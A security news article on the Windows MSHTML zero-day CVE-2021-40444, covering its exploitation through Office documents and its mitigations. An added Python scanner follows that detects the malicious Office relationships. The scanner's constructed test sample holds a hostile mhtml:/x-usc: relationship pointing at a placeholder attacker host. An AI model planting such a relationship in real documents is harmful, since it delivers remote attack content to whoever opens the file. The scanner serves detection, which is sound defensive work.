Exploit for 0-day vulnerability in Windows MSHTML published


Researchers warn that cybercriminals are already sharing tutorials and working exploits for CVE-2021-40444 on hacker forums, which lowers the bar for other attackers to use the new vulnerability in their own campaigns.

Let me remind you that last week Microsoft issued a warning about a new zero-day vulnerability in MSHTML (aka Trident), the proprietary browser engine of Internet Explorer. The issue was reported as already being exploited in real attacks against Office 365 and Office 2019 users on Windows 10, and at that point no patch was available.

The vulnerability affects Windows Server 2008 through 2019 and Windows 8.1 through 10, and is rated 8.8 out of 10 on the CVSS scale. Although MSHTML was built primarily for Internet Explorer, Office applications also use it to render web-based content inside Word, Excel, and PowerPoint documents.

As Microsoft explained, an attacker can craft a malicious ActiveX control, reference it from a Microsoft Office document, and have it processed by MSHTML when the document is opened. The attacker only needs to convince the user to open the malicious file; once that happens, the attack succeeds.

Soon after Microsoft's announcement, researchers warned that the problem could be more dangerous than it first appeared, since Protected View and Application Guard do not always prevent exploitation. The experts also found that the vulnerability can be exploited through RTF files, which Office Protected View does not cover at all, and that the bug can be triggered through document previews.

Although the experts did not disclose the details of their methods, fearing they would be picked up by cybercriminals, the hackers were able to reproduce the exploits on their own, based on the information and malicious document samples already available online. Criminals are now actively sharing detailed tutorials on hacker forums, according to Bleeping Computer journalists. Step-by-step instructions for building the payload and the custom CAB file have already been posted.

The information circulated by cybercriminals is simple and lets anyone build their own version of the CVE-2021-40444 exploit, including a Python server for delivering the malicious documents and CAB files. Using this information, the journalists were able to recreate the exploit in about 15 minutes and recorded a video demonstrating it.

The publication notes that Microsoft Defender and other security products can now detect and block the malicious documents and CAB files used in these attacks. Microsoft, for its part, advised disabling ActiveX controls in Internet Explorer (its published workaround does this through registry settings for the IE security zones), and security experts now also recommend disabling document preview in Windows Explorer, since the preview pane alone is enough to trigger the bug.
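Beyond relying on antivirus signatures, a defender can statically check incoming Office files for the document-side half of the attack described above: an Office relationship that makes the application hand an external URL to MSHTML. The scanner below is an added example written for this article, not code from the article, from Bleeping Computer or from Microsoft. It unpacks any OOXML package (.docx, .xlsx, .pptx, so it goes slightly beyond the Word case the article focuses on), parses every `.rels` part and flags relationships whose target uses the `mhtml:` moniker or the `!x-usc:` chaining seen in public analyses of the in-the-wild samples, as well as any externally linked (rather than embedded) OLE object. The sample documents, the `attacker.example` host and all relationship identifiers are constructed for the demonstration. RTF files, which the article notes bypass Protected View, store the object differently and are not covered here.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Target shapes reported in public analyses of the CVE-2021-40444 samples: an
# "mhtml:" URL, optionally chained with "!x-usc:", which Office hands to MSHTML.
MSHTML_TARGET = re.compile(r"^(?:mhtml|x-usc):|!x-usc:", re.IGNORECASE)


def find_mshtml_relationships(ooxml_bytes):
    """Scan every .rels part of an OOXML package (docx, xlsx, pptx) and return
    (rels_part, relationship_id, target, reason) tuples for relationships that
    would make Office fetch external content through MSHTML.

    Raises zipfile.BadZipFile for input that is not a ZIP container at all
    (legacy .doc and .rtf files need a different parser)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as zf:
        for part in zf.namelist():
            if not part.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(part))
            except ET.ParseError:
                continue  # not well-formed XML; Office would not load it either
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                rel_id = rel.get("Id", "")
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                if MSHTML_TARGET.search(target):
                    # Highest-confidence indicator, whatever the relationship type.
                    hits.append((part, rel_id, target, "mhtml:/x-usc: target"))
                elif external and rel.get("Type") == OLE_OBJECT:
                    # Linked (not embedded) OLE objects are rare in real documents
                    # and are how the in-the-wild samples reached out to the web.
                    hits.append((part, rel_id, target, "externally linked OLE object"))
    return hits


def build_sample_docx(document_rels_xml):
    """Constructed minimal .docx containing only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        )
        zf.writestr(
            "_rels/.rels",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="%s">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
            'officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
            '</Relationships>' % RELS_NS,
        )
        zf.writestr(
            "word/document.xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>',
        )
        zf.writestr("word/_rels/document.xml.rels", document_rels_xml)
    return buf.getvalue()


# Constructed sample: an OLE relationship pointing at an external mhtml: URL.
# "attacker.example" is a placeholder host, not an indicator from real attacks.
MALICIOUS_TARGET = ("mhtml:http://attacker.example/word.html"
                    "!x-usc:http://attacker.example/word.html")
MALICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/'
    '2006/relationships/styles" Target="styles.xml"/>'
    '<Relationship Id="rId5" Type="%s" Target="%s" TargetMode="External"/>'
    '</Relationships>' % (RELS_NS, OLE_OBJECT, MALICIOUS_TARGET)
)

# Constructed benign sample: an ordinary external hyperlink must not be flagged.
BENIGN_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/'
    '2006/relationships/hyperlink" Target="https://www.example.com/" TargetMode="External"/>'
    '</Relationships>' % RELS_NS
)

if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        hits = find_mshtml_relationships(build_sample_docx(rels))
        print(label, "->", hits if hits else "no MSHTML relationships")
```

The check deliberately ignores ordinary external hyperlinks, which are common in legitimate documents, and treats any `mhtml:` target as a hit regardless of relationship type, since there is no legitimate reason for a document to reference that moniker. To run it over a mail gateway quarantine, feed the raw attachment bytes to `find_mshtml_relationships` and alert on a non-empty result.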
